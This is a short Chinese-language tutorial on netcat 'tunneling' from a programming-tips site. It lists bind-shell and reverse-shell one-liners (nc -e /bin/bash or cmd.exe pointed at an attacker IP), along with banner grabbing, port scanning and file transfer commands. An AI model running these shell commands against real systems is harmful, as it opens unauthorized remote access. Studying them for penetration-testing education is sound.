隧道技术-nc

2022/5/22 23:06:51

本文主要是介绍隧道技术-nc,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

shell反弹

正向反弹:攻击机直接连接靶机

条件:攻击机与靶机需互相访问

eg:攻击机:192.168.3.27 靶机:192.168.3.29

1111是端口号

靶机执行:

windows机器:nc -lvvp 1111 -e C:\Windows\System32\cmd.exe

Linux机器:  nc -lvvp 1111 -e /bin/bash

攻击机执行:

nc 192.168.3.29 1111

 

反响反弹:靶机访问攻击机

条件:攻击机不能直接访问靶机,但靶机可以访问攻击机的机器,这个时候用反响shell

eg:攻击机:192.168.3.27 靶机:192.168.3.29

攻击机执行:nc -lvvp 1111 监听1111端口

 靶机执行:

windows机器IP端口:nc -e C:\Windows\System32\cmd.exe 192.168.3.27 1111 

Linux机器IP端口:nc -e /bin/bash 192.168.3.27 1111 

 

Banner抓取:靶机运行着ssh服务,可查看服务版本

nc -nv IP port

端口探测:可查看端口开放

.\nc.exe -nv IP PORT

多端口探测

nc -v -z IP 1-65525

端口监听

nc -l -p Port

文件传输

接收端:nc -lp Port>file

发送端:nc -vn IP Port < file -q 1(Windows是-w Linux是-q)

 



这篇关于隧道技术-nc的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程